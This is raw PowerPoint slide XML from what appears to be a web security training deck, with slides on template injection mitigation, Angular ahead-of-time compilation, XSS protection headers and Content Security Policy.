            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Never </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>trust user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="555750" lvl="3" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>on’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>display GET/POST parameters directly in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>template</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="555750" lvl="3" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Don’t generate dynamically template from user-provided content</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="1419622"/>
            <a:ext cx="3348037" cy="938719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0"/>
              <a:t>Example with Tapestry and AngularJS :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> ng-show="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>detailsShown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>user.name}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="2643758"/>
            <a:ext cx="5904656" cy="600164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0"/>
              <a:t>If the server-parsed expression "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>user.name" contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0"/>
              <a:t>AngularJS markup like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>"Foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>{{potential-template-injection-here}} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Bar"</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6998" y="1279212"/>
            <a:ext cx="948546" cy="280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6998" y="1851943"/>
            <a:ext cx="1050469" cy="280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783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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection Mitigation</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07504" y="987574"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Angular    offers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ahead-of-time (AOT) compilation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>turns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>the application into executable code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>compiler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>is not even available anymore in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Data bindings are already resolved, and encoded into the JS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Prevents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>dynamically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>generate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>AOT compilation effectively stops template injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>the moment of injection, the application is already compiled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>injected template code will simply be rendered, not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>executed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400"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83" y="1014143"/>
            <a:ext cx="948546" cy="280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2687978"/>
            <a:ext cx="5248449" cy="819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435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1851670"/>
            <a:ext cx="6696744" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content Security Policy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(CSP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="662816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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Browser protection</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07504" y="771550"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>HTTP response headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="table"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="546577" y="1131590"/>
            <a:ext cx="7625823" cy="3744416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5768230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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP</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07504" y="771550"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>CSP is a new browser security policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>defines what it is allowed to happen in a page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Delivered by the server in a response header or meta tag </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>(all possible with meta tag except for directives “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0" smtClean="0"/>
              <a:t>frame-ancestors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0" smtClean="0"/>
              <a:t>report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0" smtClean="0"/>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
